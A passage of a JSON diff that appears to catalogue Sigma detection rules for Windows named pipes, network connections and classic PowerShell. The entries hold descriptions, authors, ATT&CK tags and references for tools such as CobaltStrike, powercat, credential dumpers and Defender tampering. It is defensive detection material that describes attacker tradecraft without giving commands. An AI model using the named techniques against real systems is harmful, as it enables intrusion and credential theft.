"network_connection", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/intelligence-insights-november-2021/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_mobsync_connection.yml" + ], + "tags": [ + "attack.t1055", + "attack.t1218", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "9f2cc74d-78af-4eb2-bb64-9cd1d292b87b", + "value": "Microsoft Sync Center Suspicious Network Connections" + }, + { + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel.\nThe data may also be sent to an alternate network location from the main command and control server.\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/07", + "falsepositive": [ + "Other SMTP tools" + ], + "filename": "net_connection_win_susp_outbound_smtp_connections.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1048.003/T1048.003.md#atomic-test-5---exfiltration-over-alternative-protocol---smtp", + "https://www.ietf.org/rfc/rfc2821.txt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_outbound_smtp_connections.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "9976fa64-2804-423c-8a5b-646ade840773", + "value": "Suspicious Outbound SMTP Connections" + }, + { + "description": "Detects programs with network connections running in suspicious files system locations", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2017/03/19", + "falsepositive": [ + "Unknown" + ], + "filename": "net_connection_win_susp_prog_location_network_connection.yml", + "level": "high", + "logsource.category": 
"network_connection", + "logsource.product": "windows", + "refs": [ + "https://docs.google.com/spreadsheets/d/17pSTDNpa0sf6pHeRhusvWG6rThciE8CsXTSlDUAZDyo", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_prog_location_network_connection.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "7b434893-c57d-4f41-908d-6a17bf1ae98f", + "value": "Suspicious Program Location with Network Connections" + }, + { + "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", + "meta": { + "author": "Markus Neis", + "creation_date": "2019/05/15", + "falsepositive": [ + "Other Remote Desktop RDP tools", + "Domain controller using dns.exe" + ], + "filename": "net_connection_win_susp_rdp.yml", + "level": "high", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2019-0708", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_susp_rdp.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.001", + "car.2013-07-002" + ] + }, + "uuid": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", + "value": "Suspicious Outbound RDP Connections" + }, + { + "description": "Detects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making a network connections.\nOne could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/10/12", + "falsepositive": [ + "Legitimate use of wuauclt.exe over the network." 
+ ], + "filename": "net_connection_win_wuauclt_network_connection.yml", + "level": "medium", + "logsource.category": "network_connection", + "logsource.product": "windows", + "refs": [ + "https://dtm.uk/wuauclt/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/network_connection/net_connection_win_wuauclt_network_connection.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "c649a6c7-cd8c-4a78-9c04-000fc76df954", + "value": "Wuauclt Network Connection" + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", + "creation_date": "2019/09/12", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter." + ], + "filename": "pipe_created_alternate_powershell_hosts_pipe.yml", + "level": "medium", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_alternate_powershell_hosts_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "58cb02d5-78ce-4692-b3e1-dce850aae41a", + "value": "Alternate PowerShell Hosts Pipe" + }, + { + "description": "Detects a named pipe used by Turla group samples", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/11/06", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_apt_turla_namedpipes.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://attack.mitre.org/groups/G0010/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_apt_turla_namedpipes.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + 
"attack.t1106" + ] + }, + "uuid": "739915e4-1e70-4778-8b8a-17db02f66db1", + "value": "Turla Group Named Pipes" + }, + { + "description": "Detects well-known credential dumping tools execution via specific named pipes", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/11/01", + "falsepositive": [ + "Legitimate Administrator using tool for password recovery" + ], + "filename": "pipe_created_cred_dump_tools_named_pipes.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_cred_dump_tools_named_pipes.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001", + "attack.t1003.002", + "attack.t1003.004", + "attack.t1003.005" + ] + }, + "uuid": "961d0ba2-3eea-4303-a930-2cf78bbfcc5e", + "value": "Cred Dump-Tools Named Pipes" + }, + { + "description": "Detects creation of default named pipe used by the DiagTrackEoP POC", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/03", + "falsepositive": [ + "Unlikely" + ], + "filename": "pipe_created_diagtrack_eop_default_pipe.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/Wh04m1001/DiagTrackEoP/blob/3a2fc99c9700623eb7dc7d4b5f314fd9ce5ef51f/main.cpp#L22", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_diagtrack_eop_default_pipe.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "1f7025a6-e747-4130-aac4-961eb47015f1", + "value": "DiagTrackEoP Default Named Pipe" + }, + { + "description": "Detects the pattern of a pipe name as used by the tool EfsPotato", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + 
], + "filename": "pipe_created_efspotato_namedpipe.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1429530155291193354?s=20", + "https://github.com/zcgonvh/EfsPotato", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_efspotato_namedpipe.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "637f689e-b4a5-4a86-be0e-0100a0a33ba2", + "value": "EfsPotato Named Pipe" + }, + { + "description": "Detects creation of default named pipes used by the Koh tool", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/08", + "falsepositive": [ + "Unlikely" + ], + "filename": "pipe_created_koh_default_pipe.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/GhostPack/Koh/blob/0283d9f3f91cf74732ad377821986cfcb088e20a/Clients/BOF/KohClient.c#L12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_koh_default_pipe.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.credential_access", + "attack.t1528", + "attack.t1134.001" + ] + }, + "uuid": "0adc67e0-a68f-4ffd-9c43-28905aad5d6a", + "value": "Koh Default Named Pipes" + }, + { + "description": "Detects the creation of a named pipe as used by CobaltStrike", + "meta": { + "author": "Florian Roth, Wojciech Lesicki", + "creation_date": "2021/05/25", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_mal_cobaltstrike.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/d4rksystem/status/1357010969264873472", + "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis/", + "https://github.com/Neo23x0/sigma/issues/253", + 
"https://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/", + "https://redcanary.com/threat-detection-report/threats/cobalt-strike/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "d5601f8c-b26f-4ab0-9035-69e11a8d4ad2", + "value": "CobaltStrike Named Pipe" + }, + { + "description": "Detects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_mal_cobaltstrike_re.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_cobaltstrike_re.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "0e7163d4-9e19-4fa7-9be6-000c61aad77a", + "value": "CobaltStrike Named Pipe Pattern Regex" + }, + { + "description": "Detects the creation of a named pipe used by known APT malware", + "meta": { + "author": "Florian Roth, blueteam0ps, elhoim", + "creation_date": "2017/11/06", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_mal_namedpipes.yml", + "level": "critical", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/wild-neutron-economic-espionage-threat-actor-returns-with-new-tricks/71275/", + "https://securelist.com/faq-the-projectsauron-apt/75533/", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + 
"https://www.us-cert.gov/ncas/alerts/TA17-117A", + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html", + "https://thedfirreport.com/2020/06/21/snatch-ransomware/", + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://www.accenture.com/us-en/blogs/cyber-defense/turla-belugasturgeon-compromises-government-entity", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar19-304a", + "https://download.bitdefender.com/resources/files/News/CaseStudies/study/115/Bitdefender-Whitepaper-PAC-A4-en-EN1.pdf", + "https://unit42.paloaltonetworks.com/emissary-panda-attacks-middle-east-government-sharepoint-servers/", + "https://thedfirreport.com/2022/02/21/qbot-and-zerologon-lead-to-full-domain-compromise/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_mal_namedpipes.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "fe3ac066-98bb-432a-b1e7-a5229cb39d4a", + "value": "Malicious Named Pipe" + }, + { + "description": "Detects PAExec default named pipe", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/26", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_paexec_default_pipe.yml", + "level": "medium", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/microsoft/Microsoft-365-Defender-Hunting-Queries/blob/efa17a600b43c897b4b7463cc8541daa1987eeb4/Command%20and%20Control/C2-NamedPipe.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_paexec_default_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "f6451de4-df0a-41fa-8d72-b39f54a08db5", + "value": "PAExec Default Named Pipe" + }, + { + "description": "Detects execution of PowerShell via creation of named pipe starting with PSHost", + "meta": { + 
"author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2019/09/12", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_powershell_execution_pipe.yml", + "level": "informational", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190410151110.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_powershell_execution_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ac7102b4-9e1e-4802-9b4f-17c5524c015c", + "value": "PowerShell Execution Via Named Pipe" + }, + { + "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2017/06/12", + "falsepositive": [ + "Unknown" + ], + "filename": "pipe_created_psexec_default_pipe.yml", + "level": "low", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "f3f3a972-f982-40ad-b63c-bca6afdfad7c", + "value": "PsExec Default Named Pipe" + }, + { + "description": "Detects PsExec default pipe creation where the image executed is located in a suspicious location. 
Which could indicate that the tool is being used in an attack", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/04", + "falsepositive": [ + "Rare legitimate use of psexec from the locations mentioned above" + ], + "filename": "pipe_created_psexec_default_pipe_from_susp_location.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", + "https://jpcertcc.github.io/ToolAnalysisResultSheet", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_default_pipe_from_susp_location.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002", + "attack.s0029" + ] + }, + "uuid": "41504465-5e3a-4a5b-a5b4-2a0baadd4463", + "value": "PsExec Tool Execution From Suspicious Locations - PipeName" + }, + { + "description": "Detecting use PsExec via Pipe Creation/Access to pipes", + "meta": { + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/05/10", + "falsepositive": [ + "Legitimate Administrator activity" + ], + "filename": "pipe_created_psexec_pipes_artifacts.yml", + "level": "medium", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_psexec_pipes_artifacts.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.t1021.002", + "attack.execution", + "attack.t1569.002" + ] + }, + "uuid": "9e77ed63-2ecf-4c7b-b09d-640834882028", + "value": "PsExec Pipes Artifacts" + }, + { + "description": "Detects suspicious local connections via a named pipe to the AD FS configuration database (Windows Internal Database).\nUsed to access information such as the AD FS configuration settings which contains sensitive information used to sign SAML tokens.\n", + "meta": { + "author": "Roberto 
Rodriguez @Cyb3rWard0g", + "creation_date": "2021/10/08", + "falsepositive": [ + "Processes in the filter condition" + ], + "filename": "pipe_created_susp_adfs_namedpipe_connection.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/Azure/Azure-Sentinel/blob/f99542b94afe0ad2f19a82cc08262e7ac8e1428e/Detections/SecurityEvent/ADFSDBNamedPipeConnection.yaml", + "https://o365blog.com/post/adfs/", + "https://github.com/Azure/SimuLand", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_adfs_namedpipe_connection.yml" + ], + "tags": [ + "attack.collection", + "attack.t1005" + ] + }, + "uuid": "1ea13e8c-03ea-409b-877d-ce5c3d2c1cb3", + "value": "ADFS Database Named Pipe Connection" + }, + { + "description": "Detects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles", + "meta": { + "author": "Florian Roth, Christian Burkard", + "creation_date": "2021/07/30", + "falsepositive": [ + "Chrome instances using the exact same pipe name \"mojo.something\"" + ], + "filename": "pipe_created_susp_cobaltstrike_pipe_patterns.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575", + "https://gist.github.com/MHaggis/6c600e524045a6d49c35291a21e10752", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_cobaltstrike_pipe_patterns.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1055" + ] + }, + "uuid": "85adeb13-4fc9-4e68-8a4a-c7cb2c336eb7", + "value": "CobaltStrike Named Pipe Patterns" + }, + { + "description": "Detects the WMI Event Consumer service scrcons.exe creating a named pipe", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/09/01", + "falsepositive": [ + "Unknown" + ], 
+ "filename": "pipe_created_susp_wmi_consumer_namedpipe.yml", + "level": "high", + "logsource.category": "pipe_created", + "logsource.product": "windows", + "refs": [ + "https://github.com/RiccardoAncarani/LiquidSnake", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/pipe_created/pipe_created_susp_wmi_consumer_namedpipe.yml" + ], + "tags": [ + "attack.t1047", + "attack.execution" + ] + }, + "uuid": "493fb4ab-cdcc-4c4f-818c-0e363bd1e4bb", + "value": "WMI Event Consumer Created Named Pipe" + }, + { + "description": "Detects alternate PowerShell hosts potentially bypassing detections looking for powershell.exe", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/11", + "falsepositive": [ + "Programs using PowerShell directly without invocation of a dedicated interpreter", + "MSP Detection Searcher", + "Citrix ConfigSync.ps1" + ], + "filename": "posh_pc_alternate_powershell_hosts.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190815181010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_alternate_powershell_hosts.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "d7326048-328b-4d5e-98af-86e84b17c765", + "value": "Alternate PowerShell Hosts" + }, + { + "description": "Shadow Copies deletion using operating systems utilities via PowerShell", + "meta": { + "author": "frack113", + "creation_date": "2021/06/03", + "falsepositive": [ + "Legitimate Administrator deletes Shadow Copies using operating systems utilities for legitimate reason" + ], + "filename": "posh_pc_delete_volume_shadow_copies.yml", + "level": "high", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md", + "https://www.fortinet.com/blog/threat-research/stomping-shadow-copies-a-second-look-into-deletion-methods", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_delete_volume_shadow_copies.yml" + ], + "tags": [ + "attack.impact", + "attack.t1490" + ] + }, + "uuid": "87df9ee1-5416-453a-8a08-e8d4a51e9ce1", + "value": "Delete Volume Shadow Copies Via WMI With PowerShell" + }, + { + "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", + "meta": { + "author": "Florian Roth (rule), Lee Holmes (idea), Harish Segar (improvements)", + "creation_date": "2017/03/22", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_downgrade_attack.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "http://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_downgrade_attack.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "6331d09b-4785-4c13-980f-f96661356249", + "value": "PowerShell Downgrade Attack - PowerShell" + }, + { + "description": "Detects PowerShell called from an executable by the version mismatch method", + "meta": { + "author": "Sean Metcalf (source), Florian Roth (rule)", + "creation_date": "2017/03/05", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_exe_calling_ps.yml", + "level": "high", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://adsecurity.org/?p=2921", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_exe_calling_ps.yml" + ], + "tags": [ + 
"attack.defense_evasion", + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "c70e019b-1479-4b65-b0cc-cd0c6093a599", + "value": "PowerShell Called from an Executable Version Mismatch" + }, + { + "description": "Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network", + "meta": { + "author": "frack113", + "creation_date": "2021/07/21", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_powercat.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://nmap.org/ncat/", + "https://github.com/besimorhino/powercat", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_powercat.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1095" + ] + }, + "uuid": "c5b20776-639a-49bf-94c7-84f912b91c15", + "value": "Netcat The Powershell Version" + }, + { + "description": "Detects remote PowerShell sessions", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/10", + "falsepositive": [ + "Legitimate use remote PowerShell sessions" + ], + "filename": "posh_pc_remote_powershell_session.yml", + "level": "high", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_remote_powershell_session.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.006" + ] + }, + "uuid": "60167e5c-84b2-4c95-a7ac-86281f27c445", + "value": "Remote PowerShell Session (PS Classic)" + }, + { + "description": "Detects renamed powershell", + "meta": { + 
"author": "Harish Segar, frack113", + "creation_date": "2020/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_renamed_powershell.yml", + "level": "low", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_renamed_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "30a8cb77-8eb3-4cfb-8e79-ad457c5a4592", + "value": "Renamed Powershell Under Powershell Channel" + }, + { + "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", + "meta": { + "author": "frack113", + "creation_date": "2021/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_susp_athremotefxvgpudisablementcommand.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_athremotefxvgpudisablementcommand.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "f65e22f9-819e-4f96-9c7b-498364ae7a25", + "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand - PowerShell" + }, + { + "description": "Detects suspicious PowerShell download command", + "meta": { + "author": "Florian Roth", + "creation_date": "2017/03/05", + "falsepositive": [ + "PowerShell scripts that download content from the Internet" + ], + 
"filename": "posh_pc_susp_download.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_download.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "3236fcd0-b7e3-4433-b4f8-86ad61a9af2d", + "value": "Suspicious PowerShell Download" + }, + { + "description": "Adversaries may attempt to get a listing of network connections to or from the compromised system they are currently accessing or from remote systems by querying for information over the network.", + "meta": { + "author": "frack113", + "creation_date": "2021/12/10", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_susp_get_nettcpconnection.yml", + "level": "low", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1049/T1049.md#atomic-test-2---system-network-connections-discovery-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_get_nettcpconnection.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1049" + ] + }, + "uuid": "b366adb4-d63d-422d-8a2c-186463b5ded0", + "value": "Use Get-NetTCPConnection" + }, + { + "description": "Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration", + "meta": { + "author": "frack113", + "creation_date": "2021/07/20", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_susp_zip_compress.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1074.001/T1074.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_susp_zip_compress.yml" + ], + "tags": [ + "attack.collection", + "attack.t1074.001" + ] + }, + "uuid": "71ff406e-b633-4989-96ec-bc49d825a412", + "value": "Zip A Folder With PowerShell For Staging In Temp - PowerShell" + }, + { + "description": "Attempting to disable scheduled scanning and other parts of windows defender atp. Or set default actions to allow.", + "meta": { + "author": "frack113", + "creation_date": "2021/06/07", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_tamper_with_windows_defender.yml", + "level": "high", + "logsource.category": "ps_classic_provider_start", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_tamper_with_windows_defender.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "ec19ebab-72dc-40e1-9728-4c0b805d722c", + "value": "Tamper Windows Defender - PSClassic" + }, + { + "description": "Detects suspicious use of the WSMAN provider without PowerShell.exe as the host application.", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/06/24", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_wsman_com_provider_no_powershell.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/chadtilbury/status/1275851297770610688", + "https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement/", + "https://github.com/bohops/WSMan-WinRM", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_wsman_com_provider_no_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.lateral_movement", + "attack.t1021.003" + ] + }, + "uuid": "df9a0e0e-fedb-4d6c-8668-d765dfc92aa7", + "value": "Suspicious Non PowerShell WSMAN COM Provider" + }, + { + "description": "Detects suspicious powershell process which includes bxor command, alternative obfuscation method to b64 encoded commands.", + "meta": { + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "creation_date": "2020/06/29", + "falsepositive": [ + "Unknown" + ], + "filename": "posh_pc_xor_commandline.yml", + "level": "medium", + "logsource.category": "ps_classic_start", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=46", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/powershell/powershell_classic/posh_pc_xor_commandline.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "812837bb-b17f-45e9-8bd0-0ec35d2e3bd6", + "value": "Suspicious XOR Encoded PowerShell Command Line - PowerShell" + }, + { 